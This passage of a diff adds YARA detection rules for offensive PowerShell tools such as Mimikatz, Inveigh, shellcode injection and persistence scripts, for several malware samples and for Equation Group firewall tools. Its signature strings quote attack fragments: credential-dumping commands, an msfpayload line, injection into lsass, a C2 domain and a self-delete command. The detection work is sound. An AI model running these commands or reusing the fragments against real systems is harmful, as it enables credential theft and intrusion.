+      $s7 = "Write-Verbose \"Executing command '$Cmd'\"" fullword ascii
+      $s8 = "Write-Warning \"[!] Target service" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 4000KB and 1 of them ) or ( 3 of them )
+}
+
+rule ps1_toolkit_Inveigh_BruteForce_RID3303 : DEMO FILE HKTL SCRIPT T1059_001 T1086 T1110 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Inveigh-BruteForce.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 14:29:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086, T1110"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Import-Module .\\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 " fullword ascii
+      $s2 = "$(Get-Date -format 's') - Attempting to stop HTTP listener\")|Out-Null" fullword ascii
+      $s3 = "Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 300KB and 1 of them ) or ( 2 of them )
+}
+
+rule ps1_toolkit_Invoke_Shellcode_RID3247 : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Invoke-Shellcode.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 13:58:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "24abe9f3f366a3d269f8681be80c99504dea51e50318d83ee42f9a4c7435999a"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+      $s2 = "Get-ProcAddress kernel32.dll OpenProcess" fullword ascii
+      $s3 = "msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2- " fullword ascii
+      $s4 = "inject shellcode into" ascii
+      $s5 = "Injecting shellcode" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 90KB and 1 of them ) or ( 3 of them )
+}
+
+rule ps1_toolkit_Invoke_Mimikatz_RID31FA : DEMO FILE HKTL S0002 SCRIPT T1003 T1059_001 T1075 T1086 T1097 T1178 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Invoke-Mimikatz.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 13:45:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
+      tags = "DEMO, FILE, HKTL, S0002, SCRIPT, T1003, T1059_001, T1075, T1086, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+      $s2 = "ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId" fullword ascii
+      $s3 = "privilege::debug exit" ascii
+      $s4 = "Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" fullword ascii
+      $s5 = "Invoke-Mimikatz -DumpCreds" fullword ascii
+      $s6 = "| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 10000KB and 1 of them ) or ( 3 of them )
+}
+
+rule ps1_toolkit_Invoke_RelfectivePEInjection_RID36F5 : DEMO FILE HKTL SCRIPT T1055 T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Invoke-RelfectivePEInjection.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 17:18:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1055, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)" fullword ascii
+      $x2 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local" fullword ascii
+      $x3 = "} = Get-ProcAddress Advapi32.dll OpenThreadToken" ascii
+      $x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii
+      $s5 = "$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')" fullword ascii
+      $s6 = "= Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 700KB and 2 of them ) or ( all of them )
+}
+
+rule ps1_toolkit_Persistence_RID306E : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Persistence.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 12:39:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```" ascii
+      $s2 = "}=$PROFILE.AllUsersAllHosts;${" ascii
+      $s3 = "C:\\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup" ascii
+      $s4 = "= gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture" ascii
+      $s5 = "-eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))" ascii
+      $s6 = "}=$PROFILE.CurrentUserAllHosts;${" ascii
+      $s7 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+      $s8 = "[System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+}
+
+rule ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection_RID3A9A : DEMO FILE HKTL S0002 SCRIPT T1003 T1059_001 T1075 T1086 T1097 T1178 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 19:53:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
+      hash2 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
+      tags = "DEMO, FILE, HKTL, S0002, SCRIPT, T1003, T1059_001, T1075, T1086, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+      $s2 = "if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)" fullword ascii
+      $s3 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)" fullword ascii
+      $s4 = "Function Import-DllInRemoteProcess" fullword ascii
+      $s5 = "FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))" fullword ascii
+      $s6 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)" fullword ascii
+      $s7 = "[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)" fullword ascii
+      $s8 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null" fullword ascii
+      $s9 = "::FromBase64String('RABvAG4AZQAhAA==')))" ascii
+      $s10 = "Write-Verbose \"PowerShell ProcessID: $PID\"" fullword ascii
+      $s11 = "[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 10000KB and 3 of them ) or ( 6 of them )
+}
+
+rule ps1_toolkit_Inveigh_BruteForce_2_RID3394 : DEMO FILE HKTL SCRIPT T1059_001 T1086 T1110 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Inveigh-BruteForce.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 14:53:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086, T1110"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "}.NTLMv2_file_queue[0]|Out-File ${" ascii
+      $s2 = "}.NTLMv2_file_queue.RemoveRange(0,1)" ascii
+      $s3 = "}.NTLMv2_file_queue.Count -gt 0)" ascii
+      $s4 = "}.relay_running = $false" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+}
+
+rule ps1_toolkit_PowerUp_2_RID2F4C : DEMO FILE HKTL SCRIPT T1059_001 T1086 T1087 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files PowerUp.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 11:51:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086, T1087"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::" ascii
+      $s2 = "FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {" ascii
+      $s3 = "$Null = Invoke-ServiceStart" ascii
+      $s4 = "Write-Warning \"[!] Access to service $" ascii
+      $s5 = "} = $MyConString.Split(\"=\")[1].Split(\";\")[0]" ascii
+      $s6 = "} += \"net localgroup ${" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 2000KB and 2 of them ) or ( 4 of them )
+}
+
+rule ps1_toolkit_Persistence_2_RID30FF : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Persistence.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 13:03:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+      $s2 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')" ascii
+      $s3 = "FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')" ascii
+      $s4 = "[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]" ascii
+      $s5 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))" ascii
+      $s6 = "[Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]" fullword ascii
+      $s7 = "FromBase64String('TQBlAHQAaABvAGQA')" ascii
+      $s8 = "FromBase64String('VAByAGkAZwBnAGUAcgA=')" ascii
+      $s9 = "[Runtime.InteropServices.CallingConvention]::Winapi," fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+}
+
+rule ps1_toolkit_Inveigh_BruteForce_3_RID3395 : DEMO FILE HKTL SCRIPT T1059_001 T1086 T1110 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Inveigh-BruteForce.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/vysec/ps1-toolkit"
+      date = "2016-09-04 14:54:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash3 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086, T1110"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "::FromBase64String('TgBUAEwATQA=')" ascii
+      $s2 = "::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))" ascii
+      $s3 = "::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))" ascii
+      $s4 = "::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))" ascii
+      $s5 = "[Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`" fullword ascii
+      $s6 = "KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA" ascii
+      $s7 = "}.bruteforce_running)" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
+}
+
+rule Malware_QA_not_copy_RID2E95 : DEMO EXE FILE MAL {
+   meta:
+      description = "VT Research QA uploaded malware - file not copy.exe"
+      author = "Florian Roth"
+      reference = "VT Research QA"
+      date = "2016-08-29 11:20:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1410f38498567b64a4b984c69fe4f2859421e4ac598b9750d8f703f1d209f836"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "U2VydmVyLmV4ZQ==" fullword wide
+      $x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii
+      $x3 = "fuckyou888.ddns.net" fullword wide
+      $s1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+      $s2 = "Server.exe" fullword wide
+      $s3 = "Execute ERROR" fullword wide
+      $s4 = "not copy.exe" fullword wide
+      $s5 = "Non HosT" fullword wide
+      $s6 = "netsh firewall delete allowedprogram" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+}
+
+rule Malware_QA_tls_RID2C7D : DEMO EXE FILE MAL {
+   meta:
+      description = "VT Research QA uploaded malware - file tls.exe"
+      author = "Florian Roth"
+      reference = "VT Research QA"
+      date = "2016-08-29 09:51:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f06d1f2bee2eb6590afbfa7f011ceba9bd91ba31cdc721bc728e13b547ac9370"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\funoverip\\ultimate-payload-template1\\" ascii
+      $s2 = "ULTIMATEPAYLOADTEMPLATE1" fullword wide
+      $s3 = "ultimate-payload-template1" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+}
+
+rule Malware_QA_get_The_FucKinG_IP_RID31C8 : DEMO EXE FILE MAL {
+   meta:
+      description = "VT Research QA uploaded malware - file get The FucKinG IP.exe"
+      author = "Florian Roth"
+      reference = "VT Research QA"
+      date = "2016-08-29 13:37:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7b2c04e384919075be96e3412d92c14fc1165d1bc7556fd207488959c5c4d2f7"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\Mdram ahmed\\AppData" 
+      $x2 = "\\Local\\Temporary Projects\\get The FucKinG IP\\" ascii
+      $x3 = "get The FucKinG IP.exe" fullword wide
+      $x4 = "get ip by mdr3m" fullword wide
+      $x5 = "MDR3M kik: Mdr3mhm" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule Malware_QA_1177_RID2BFA : DEMO FILE MAL SCRIPT {
+   meta:
+      description = "VT Research QA uploaded malware - file 1177.vbs"
+      author = "Florian Roth"
+      reference = "VT Research QA"
+      date = "2016-08-29 09:29:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ff3a2740330a6cbae7888e7066942b53015728c367cf9725e840af5b2a3fa247"
+      tags = "DEMO, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".specialfolders (\"startup\") & \"\\ServerName.EXE\"" fullword ascii
+      $x2 = "expandenvironmentstrings(\"%%InsallDir%%\") " ascii
+      $s1 = "CreateObject(\"WScript.Shell\").Run(" ascii
+      $s2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA" ascii
+      $s3 = "cial Thank's to Dev-point.com" fullword ascii
+      $s4 = ".createElement(\"tmp\")" fullword ascii
+      $s5 = "'%CopyToStartUp%" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x4d27 and filesize < 100KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+}
+
+rule WCE_in_memory_RID2C1E : DEMO HKTL T1003 {
+   meta:
+      description = "Detects Windows Credential Editor (WCE) in memory (and also on disk)"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-08-28 09:35:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wkKUSvflehHr::o:t:s:c:i:d:a:g:" fullword ascii
+      $s2 = "wceaux.dll" fullword ascii
+   condition: 
+      all of them
+}
+
+rule b374k_back_connect_RID2DB5 : APT DEMO EXE FILE T1068 {
+   meta:
+      description = "Detects privilege escalation tool"
+      author = "Florian Roth"
+      reference = "Internal Analysis"
+      date = "2016-08-18 10:43:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c8e16f71f90bbaaef27ccaabb226b43762ca6f7e34d7d5585ae0eb2d36a4bae5"
+      tags = "APT, DEMO, EXE, FILE, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "AddAtomACreatePro" fullword ascii
+      $s2 = "shutdow" fullword ascii
+      $s3 = "/config/i386" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 10KB and all of them )
+}
+
+rule APT_EQGRP_RC5_RC6_Opcode_RID2EE0 : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
+      date = "2016-08-17 11:33:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B } 
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_screamingplow_RID2FAE : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file screamingplow.sh"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "What is the name of your PBD:" fullword ascii
+      $s2 = "You are now ready for a ScreamPlow" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_MixText_RID2D06 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file MixText.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:14:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "BinStore enabled implants." fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_payload_RID2D1D : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file payload.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "can't find target version module!" fullword ascii
+      $s2 = "class Payload:" fullword ascii
+   condition: 
+      all of them
+}
+
+rule APT_EQGRP_userscript_RID2E87 : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - file userscript.FW"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:18:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_tinyexec_RID2D9C : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files tinyexec"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 } 
+      $s2 = { 5A 58 55 52 89 E2 55 50 89 E1 } 
+   condition: 
+      uint32 ( 0 ) == 0x464c457f and filesize < 270 and all of them
+}
+
+rule APT_EQGRP_callbacks_RID2DD3 : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - Callback addresses"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "30.40.50.60:9342" fullword ascii wide
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_Unique_Strings_RID2FF3 : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - Unique strings"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:19:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
+      $s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)" 
+   condition: 
+      1 of them
+}
+
+rule APT_install_get_persistent_filenames_RID35AE : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file install_get_persistent_filenames"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 16:23:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Generates the persistence file name and prints it out." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and all of them )
+}
+
+rule APT_EQGRP_tunnel_state_reader_RID321B : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - file tunnel_state_reader"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 13:51:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii
+      $s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_eligiblecandidate_RID310D : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 13:06:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii
+      $o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii
+      $c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii
+      $c2 = "self.build_exploit_payload(cmd)" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_networkProfiler_orderScans_RID34F3 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 15:52:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Unable to save off predefinedScans directory" fullword ascii
+      $x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_epicbanana_2_1_0_1_RID3075 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:40:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "failed to create version-specific payload" fullword ascii
+      $s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_sniffer_xml2pcap_RID30A6 : APT DEMO T1040 {
+   meta:
+      description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:48:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
